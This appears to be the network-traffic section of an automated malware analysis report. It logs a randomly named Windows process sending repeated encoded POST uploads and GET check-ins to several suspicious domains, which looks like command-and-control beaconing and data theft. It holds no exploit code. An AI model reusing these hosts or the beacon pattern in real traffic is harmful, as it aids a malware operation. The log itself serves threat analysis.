                                                                                                                            Data Ascii: 2BWDG=N5gn8Qs07znskpMMh7MMSKa554t5V19EDFzy2XWJZbd+iAksAryak0rDnDjxGwIrVu1nEYkFkA/a9cB1U3MaNy/lrizE4e51NqXVxW4Ols64t283UVMCFH40aRb1I8qiuN4Q00esn2D/8nzHW3UryQox24rN5gxE7A3/1yRbzE8RUWkh0vI3C185yUp6XuuUYg==
                                                                                                                             Oct 19, 2024 12:57:19.980660915 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:19 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHB3N0phCtXpx3kUmVrWpZAbollU%2Fd5%2BaA9gAXg8iDaqNLVeXe16bRRvxFTw%2FQ5ar%2BWJqWBmUEfn49rsKG1lZFGpGgxswoGsr%2BRU%2FrdOFX%2FTw3bYwuFcEXM4Vm8EuGQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f21accf4755-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=851&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                             Oct 19, 2024 12:57:19.980705976 CEST | 279 | IN | (gzip-compressed response body, continued)


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             2 | 192.168.2.4 | 49858 | 172.67.181.186 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:57:21.651331902 CEST | 871 | OUT | POST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=N5gn8Qs07znsmJ8MxsYMDqa+nIt5cV8NDC7y2TvEYop+jlgsBqyan0rDsjjObgIeVuIaEZYFkDDa9eZ1UgZMMi/nnCzGy+51NqXVxWtrlsy4sF03V0MBZX43dRb1fsquuN5D026Sn0L/8j3HVi4o7Qp64YqO6wFJ6jO21zg+ynEBVQ17lepgQ1YKvTgOatTdDttdsz4GdwZGn3eUf1rU07Q=
                                                                                                                             Oct 19, 2024 12:57:22.531109095 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:22 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk0aOoI3qPpWVp5RmmHPPHv%2BRbQyye3w3VaIk6m0grob2oM%2F0glOLi8lvyZjNHnVFWx5Tay9yoJTlGxFzMVzHU5lesQMjJtO7i1fFisjGk61zIu9OnQ6j6tfJ3HF%2Bq8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f319fc42e24-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1379&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=871&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                             Oct 19, 2024 12:57:22.531152010 CEST | 276 | IN | (gzip-compressed response body, continued)


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             3 | 192.168.2.4 | 49873 | 172.67.181.186 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:57:24.191217899 CEST | 10953 | OUT | POST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Oct 19, 2024 12:57:25.081526995 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:25 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goE3%2BRYobqylU7ctcI36hS1eL5y24WeXlhauy2UrQ2dsijJgI34Xyl6OTCdd50PVcdJ68772faGy%2Bvhd2GVV82iKGtTWcrOWmcFuMWC0jL157cSL736%2BMFwL5DW%2F4iI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f418f550baf-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10953&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                             Oct 19, 2024 12:57:25.081568003 CEST | 276 | IN | (gzip-compressed response body, continued)


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             4 | 192.168.2.4 | 49888 | 172.67.181.186 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:57:26.733472109 CEST | 591 | OUT | GET /uy9i/?2BWDG=A7IH/mkAt1Xlqot58OI0S8+25JAud1UhEF7OmTb3ULNYiQ53L6C3hDLglTjiGws4A/oSTbY/vB+Y5OcBKWIDb0nFjD7/puJZKInM70o9vL6/qU8mcXMhaE0=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:27.617151976 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:27 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Yp%2BuPXk4Ewivba0Thsmx5AiY0fPiprTwwnECdc69L2I%2BN7Uj06ID9pfnUoNN%2B6Ztv4UBnUMRAQiky2Rj7%2B%2BNpECYqDhE2XdzIzjhwaDTRY88QIjqYkSQBWow%2FIUGzQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f5168b46c10-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Ascii: 48b<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4e
                                                                                                                            Oct 19, 2024 12:57:27.617203951 CEST | 707 | IN
                                                                                                                            Data Ascii: m;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;b


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            5 | 192.168.2.4 | 49919 | 104.223.44.195 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:32.919644117 CEST | 875 | OUT | POST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=HCim7or0elNOUy8B1Sc8zBDwF7+LWCa+k5tW8ktuxTOvLbUhLwVgPuPsFUI9AJXGLHq+lppcBTZUPlzMkZsZ7yazXpeC+ClanBCJ+NHYV6DrRn1yk1JNbDbzEe84qqOsAl14DP8e8EOGwfBjUYmPDktKv+iGSw4Qd81uxj1buKJeNw40kAOQCMduI5YsiV3/aQ==
                                                                                                                            Oct 19, 2024 12:57:33.502212048 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:33 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            6 | 192.168.2.4 | 49935 | 104.223.44.195 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:35.471951962 CEST | 895 | OUT | POST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=HCim7or0elNOXSsB5RE81hD/ZL+Lcialk5xW8mBAk1+vL/YhIytgOuPsP0J3OpXNLHmclplcBTdUPnrMlqEW6iaxCZeAzilanBCJ+NDyV5zrRS9ylQpOSjb0De8456OwAl0VDOQ48BKGwatjaqeAJksPyOjMdllfdMwA7jk7mac4FWpu1xvHQM5dV+RYvWK2BVBCEQx0jyv0CBvLTFv92SI=
                                                                                                                            Oct 19, 2024 12:57:36.075556993 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:35 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            7 | 192.168.2.4 | 49950 | 104.223.44.195 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:38.022330046 CEST | 10977 | OUT | POST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG= [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:57:38.644953012 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:38 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            8 | 192.168.2.4 | 49965 | 104.223.44.195 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:40.561228991 CEST | 599 | OUT | GET /czzt/?2BWDG=KAKG4dTjIDwNH0df8gU76RPra4TcXDDcoeBE7DNk+h+PFOgCIDI8J8PfDl8Ob7fEK2PQwbhHJxVFGH/KvrYWkV/dbZ6zqApOmDyx5MnRXvHLaXYjnht+BzI=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:41.162436962 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:41 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            9 | 192.168.2.4 | 49996 | 203.161.41.204 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:46.217314005 CEST | 860 | OUT | POST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=kzrSxzGgJuGsjND/kPVqGed1uxahBbyOKrielot0wxehdEezqW9sbIBMRhohS4yrDm95a7ikPgOYZ14SRf8o1STRo0vbjE2RA7yHLUedwMht8+9B60Qo0IVTZM/Gbvyoc48ZwAF+sOQ2bR7NAIA1wWea0RBbFLPRD6aZ5Ce6H6Wv+pY/woLaWmbabfrx2ukAeg==
                                                                                                                            Oct 19, 2024 12:57:46.878372908 CEST | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:46 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            10 | 192.168.2.4 | 50012 | 203.161.41.204 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:48.768079042 CEST | 880 | OUT | POST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=kzrSxzGgJuGshoL/mopqSOd0hRahO7yKKruelpZklTqhakuzrUFscIBMZBoocYy8DmwZa+KkPgKYZwESRskr0CTPnUvdsk2RA7yHLUKzwI1t8K5B6QErqYVQP8/Gfvzjc49MwChHsIU2bVzNDakq6WecpBBJG4yvMfnp2y3YYOi2yPJlhZqNEm/pGYiF7tZJFtpZDT1AdwfkJ8urvuUTdn4=
                                                                                                                            Oct 19, 2024 12:57:49.461445093 CEST | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:49 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            11 | 192.168.2.4 | 50018 | 203.161.41.204 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:51.334908009 CEST | 10962 | OUT | POST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG= [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:57:52.037790060 CEST | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:51 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
